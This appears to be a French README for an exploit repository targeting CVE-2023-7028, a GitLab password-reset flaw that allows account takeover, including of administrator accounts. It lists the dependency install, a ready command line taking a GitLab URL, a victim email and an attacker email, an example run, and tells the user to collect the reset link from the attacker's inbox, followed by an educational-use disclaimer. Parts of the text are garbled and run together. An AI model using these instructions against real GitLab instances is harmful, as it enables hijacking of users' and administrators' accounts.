
Ce dépôt contient un exploit pour CVE-2023-7028, une vulnérabilité critique dans GitLab qui permet à un attaquant d'abuser de la fonctionnalité de réinitialisation de mot de passe et de prendre le contrôle de comptes, y compris les comptes administrateur.
/users/password dans GitLabrequestspip install requests
python3 attack.py -u <gitlab_url> -t <target_email> -e <attacker_email>
Exemple :
python3 attack.py -u http://example.com -t [email protected] -e [email protected]
L'exploit enverra des e-mails de réinitialisation de mot de passe à la fois à la victime et à l'adresse e-mail de l'attaquant. Une fois l'exécution réussie, vérifiez la boîte mail de l'attaquant pour obtenir un lien de réinitialisation de mot de passe.
root).Cet exploit est destiné uniquement à des fins éducatives et de test autorisé.
Utilisez ce code de manière responsable. L'accès non autorisé à des systèmes est illégal.